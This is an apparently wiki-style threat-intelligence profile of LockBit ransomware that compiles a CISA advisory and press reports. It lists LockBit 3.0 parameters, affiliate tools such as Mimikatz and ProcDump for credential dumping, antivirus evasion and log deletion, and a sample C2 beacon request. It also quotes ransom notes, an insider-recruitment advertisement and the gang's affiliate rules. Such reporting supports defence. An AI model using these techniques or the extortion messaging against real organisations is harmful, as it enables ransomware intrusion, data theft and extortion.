LockBit

CISA (2023)

CyberSecurity & Infrastructure Security Agency (March 16, 2023) #StopRansomware : LockBit 3.0

LockBit has functioned as an affiliate-based ransomware variant. LockBit 3.0, also known as "LockBit Black" is more modular than its previous versions. LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware.

LockBit command line parameters :

* -pass  (32 character value) : Password used to to launch LockBit 3.0, required.
* -path (file or path) : Only encrypts provided file or folder
* -gspd : Spread via group policy
* -psex : Spread via admin shares
* -safe : Reboot host into Safe Mode, to circumvent endpoint antivirus and detection. 
* -wall : Sets LockBit 3.0 wallpaper and prints out LockBit 3.0 ransom note
* -del : Self-delete after successful ransom payment
* -gdel : Remove LockBit 3.0 group policy changes after successful ransom payment

Password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable's encrypted portion will vary based on the cryptographic key used for encryption.

LockBit 3.0 will only infect machines that do not have language settings matching in a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria) and Tatar (Russia). If a language from the exclusion list is detected, LockBit 3.0 will stop execution without infecting the system.

Intrusions

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim network via phising campaigns, abuse of valid accounts, exploitation of public-facing applications, external remote services^[1] and drive-by compromise ^[2]

LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities, such as network reconnaissance, remote access and tunneling, credential dumping and file exfiltration. Use of PowerShell and Batch scripts are observed across moss intrusions, which focus on system discovery, reconnaissance, credential hunting and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed.

Tools used by LockBit 3.0 affiliates :

Impacket : Collection of Python classes for working with network protocols
Microsoft Sysinternals ProcDump : Generates crash dumps of LSASS.exe (Local Security Authority Subsystem Service). After a users logs on, the system generates and stores a variety of credential materials in LSASS process memory. Adversaries may attempt to access credential material stored here.
Microsoft Sysinternals PsExec : Execute a command-line process on a remote machine
Mimikatz : Credential dumper capable of obtaining plaintext Windows account logins and password.
Ngrok : Legitimate remote-access tool abused to bypass victim network protections
PuTTY Link : To automate SSH actions on Windows
SoftPerfect Network Scanner : Performs network scans
Splashtop : Remote-desktop software
WinSCP : SSH File Transfer Protocol client for Windows
Chocolatey : Command-line package manager for windows
FileZilla : FTP application

Infection

If privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges. LockBit 3.0 performs functions such as

Enumerating system information (hostname, host configuration, domain information, local drive configuration, remote shares, mounted external storage devices)
Terminating processes and services
Launching commands
Automatically execute a program during system boot. Since some boot programs run with higher privileges.
Deleting log files, files in the recycle bin folder, and shadow copies residing on disk

LockBit 3.0 attempts to spread across a victim network by using a compromised local account with elevated privileges or using a preconfigured list of credentials hardcoded at compilation time. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol.

Encryption

LockBit 3.0 attempts to encrypt data saved to any local or remote device, but skips files associated with core system functions. After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <RansomwareID>.README.txt and changes the host's wallpaper and icons to LockBit 3.0 branding.

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.

If configured, Lockbit 3.0 will send two HTTP POST request to one of the command and control (c2) servers. Information about the victim host and bot are encrypted with an AES key and encoded in base 64

POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl

Example of information found in encrypted data

{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}

LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0; rclone, an open-source command line cloud storage manager; and publicly available file sharing services, such as MEGA, to exfiltrate sensitive company data files prior to encryption. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well :

premiumize com
anonfiles com
sendspace com
fex net
send exploit in

Ars Technica (2020)

Dan Goodin (2020) LockBit, the new ransomware for hire : A sad and cautionary tale Ars Technica

After getting in, LockBit used a dual method to map out and infect victimized network. First, the ARP tables, which map IP addresses to device MAC addresses, helped to locate accessible system. Second, server message block, a protocol used for sharing files and folders among networked machines, allowed the infected nodes to connect to uninfected ones. LockBit would then execute a PowerShell script that spread the ransomware to those machines. The malicious file the PowerShell script downloaded was disguised as a PNG image. In fact, it was a executable program that encrypted the files on the machine.

LockBit had another trick. Before the ransomware encrypted data, it connected to an attacker-controlled server and then used the victim's machine IP address to determine where it was located. If it resided in Russia or another country belonging to the Commonwealth of Independent States, it would abort the process.

Once the data was locked up, organization computers were left with a desktop that contain this message as its wallpaper.

“”All your files are encrypted by LockBit. For more information, see Restore-My-Files.txt that is located in every encrypted folder

The ransomware note looked like this.

All your important files are encrypted!
Any attempts to restore your files with the thrid-party [sic] software will be fatal for your files!
RESTORE YOU [sic] DATA POSIBLE [sic] ONLY BUYING private key from us.
There is only one way to get your files back:

| 1. Download Tor browser and install it.
| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?E3D94FA5
| 3. Follow the instructions on this page

### Attention! ###
# Do not rename encrypted files.
# Do not try to decrypt using third party software, it may cause permanent data loss.
# Decryption of your files with the help of third parties may cause increased price(they add their fee to our).
# Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN.
# Tor Browser user manual https://tb-manual.torproject.org/about

!!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on.
Don't forget about GDPR.

Using a Tor site, the organization paid the ransom and, after several hours, used the same anonymous service to obtain the decryption key. Those behind this attack had a support desk that communicated over the anonymized Jabber messenger to resolve several problems the organization had in rebuilding the locked-up network.

LockBit's creators offer a ransomware-as-a-service to customers. LockBit is sold in underground broker forums that often require sellers to put up a deposit that customers can recover in the event the wares don't perform as advertised. In a testament to their confidence and determination, the LockBit sellers have forked out almost $75,000.

Kaspersky

LockBit ransomware - What You need to Know

Attacks began in September 2019, when it was dubbed the ".abcd virus", a reference to the file extension name used when encrypting a victim's files. Notable past targets include organizations in the United States, India, Indonesia, Ukraine. Additionally various countries throughout Europe (France, UK, Germany) have seen attacks. In its automated vetting process, it seems to also intentionally avoid attacking systems local to Russia or to any other countries within the Commonwealth of Independent States.

LockBit functions as ransomware-as-a-service. Willing parties put a deposit down for the use for custom for-hire attacks, and profit under an affiliate framework. Ransom payments are divided between the LockBit developer team and the attacking affiliates, who receive up to 3/4 of the ransom funds.

Affiliate program advertisement

Twitter user @anvie shared^[3] a screenshot of a ransom note file 1tyKuaqlZ.README^[4] containing an advertisement for LockBit's affilate program.

>>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems!

>>>> Warning! If you do not pay the ransom we will attack your company repeatedly again!

>>>> Advertisement

Would you like to earn millions of dollars $$$ ?
 
Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. 

You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. 

Open our letter at your email. Launch the provided virus on any computer in your company. 

You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. 

Companies pay us the foreclosure for the decryption of files and prevention of data leak. 

You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. 

If you want to contact us, write in jabber or tox. 

Tox ID LockBitSupp: ████ 

XMPP (Jabber) Support: ███@iexploit.im ████@thesecure.biz 

If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser 

Links for Tor Browser: 
http://█████.onion

Links for the normal browser 
http://█████.uz 
http://█████.onion.ly

LockBit BLOG

LockBit BLOG is an onion site used by the affiliate group to leak the stolen data and recruit new affiliate.^[5] Here, the group claimed that their activity has been active since September 3, 2019.

Main features

The group explained the feature of LockBit 3.0 in details, confirming several of CISA's analysis :

“”

- StealBit stealer, searchable by file name and extension;
- ability to generate builds with different settings, but with one encryption key for one corporate network;
- ability to edit the list to kill processes and services;
- ability to edit the list of exceptions - computer name, names and file extensions that do not need to be encrypted;
- SafeMode operation for bypassing anti-viruses and stronger encryption;
- automatic distribution in the domain network at runtime without the need for scripts, GPO or psexec methods;
- safely delete the shadow copies;
- delete artifacts from system journals. It necessary to protect from forensics examination;
- shutting down the computer after finishing work, to make it impossible to remove the dump from RAM
- impersonation to automatically elevate permissions on local computers;

— LockBit BLOG : /rules

And even revealing several more.

“”

- admin panel on the Tor network;
- the ability to create private chats for secret communication with companies;
- automatic data uploading to the blog, by you personally without our participation;
- Ability to post the history of correspondence with the attacked company to the blog;
- work on all versions of Windows, with very flexible settings (exe, dll, ReflectiveDll, ps1);
- running on all versions of ESXi (except 4.0), with very flexible settings;
- work on multiple Linux versions (14 architectures for NAS encryption, RedHat, KVM and others);
- printing claims on network printers in infinite numbers;
- port scanner in local subnets, can detect all shared DFS, SMB, WebDav resources;

— LockBit BLOG : /rules

Affiliate system

Here are several excerpts that explain how their affiliate system works.

“” We are ready to work with access providers: sale or on a percentage of redemption, but you have to trust us completely. We provide a completely transparent process - you can control the communication with the victim. In case when the company was encrypted and has not paid, you will see the stolen data in the blog.

— LockBit BLOG : /rules

“”

You personally communicate with the attacked companies and decide yourself how much money to take for your invaluable pentest work, which should surely be generously paid. You receive payments from companies to your personal wallets in any convenient currency and only then transfer the share to our affiliate program.

However, for ransom amounts over $500 thousand, you give the attacked company 2 wallets for payment - one is yours, to which the company will transfer 80%, and the second is ours for 20%, thus we will be protected from scam on your part.

— LockBit BLOG : /rules

“”

After many years of experience, we concluded that the most effective way to test a candidate for accession is a deposit. When you join, you deposit 1 bitcoin in our wallet, in fact, this amount is an advance and will be used at your subsequent payments as payment for our 20% share.

For example, the company paid you a ransom for decrypting 100 bitcoins, you have to transfer a share of 20 bitcoins to us, but thanks to the deposit you made when you joined, the amount of the share paid will be 19 bitcoins.

This procedure is required only once, only when you join the affiliate program. The deposit weeds out insecure newbies, cops, agents, journalists, web pentesters, competitors, and other small rodent pests.

— LockBit BLOG : /rules

Forbidden region

LockBit BLOG, on their "rules" page, explained the actual rationale behind their policy of avoiding attacking systems located in Russia or any other countries within the Commonwealth of Independent States.

“”It is forbidden to attack the post-Soviet countries such as : Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Lithuania, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan, Ukraine and Estonia. This is due to the fact that most of our developers and partners were born and grew up in the Soviet Union.

— LockBit BLOG : /rules

Notes

↑ Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external location.
↑ Adversaries gain access to a system through a user visiting a website over the normal course of browsing. Often the website used by an adversary is one frequently visited by a specific community. This kind of targeted campaign is often referred to "watering hole attack". Rather than tracking its prey over a long distance, the hunter instead determines where the prey is likely to go, most commonly to a body of water -- the watering hole -- and the hunter waits there. The focus of this technique is to exploit software on a client endpoint upon visiting a website. When a user visits a website, malicious scripts automatically execute, searching versions of the browser and plugins for a potentially vulnerable version. Upon finding a vulnerable version, exploit code is delivered to the browser. If exploitation is successful, it will give the adversary code execution on the user's system. Meanwhile, adversaries may also use compromised websites to deliver a user to a malicious application designed to steal application access tokens.
↑ https://twitter.com/anvie/status/1657218349112389632?s=20
↑ This filename format matches the description from CISA (2023). See "Encryption" section.
↑ The actual onion URL of this blog can't be showed here since it contains sensitive private data stolen from the victims

[1] Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external location.

[2] Adversaries gain access to a system through a user visiting a website over the normal course of browsing. Often the website used by an adversary is one frequently visited by a specific community. This kind of targeted campaign is often referred to "watering hole attack". Rather than tracking its prey over a long distance, the hunter instead determines where the prey is likely to go, most commonly to a body of water -- the watering hole -- and the hunter waits there. The focus of this technique is to exploit software on a client endpoint upon visiting a website. When a user visits a website, malicious scripts automatically execute, searching versions of the browser and plugins for a potentially vulnerable version. Upon finding a vulnerable version, exploit code is delivered to the browser. If exploitation is successful, it will give the adversary code execution on the user's system. Meanwhile, adversaries may also use compromised websites to deliver a user to a malicious application designed to steal application access tokens.

[tw-3] ttps://twitter.com/anvie/status/1657218349112389632?s=20

[4] This filename format matches the description from CISA (2023). See "Encryption" section.

[5] The actual onion URL of this blog can't be showed here since it contains sensitive private data stolen from the victims

[1]

[2]

[3]

[4]

[5]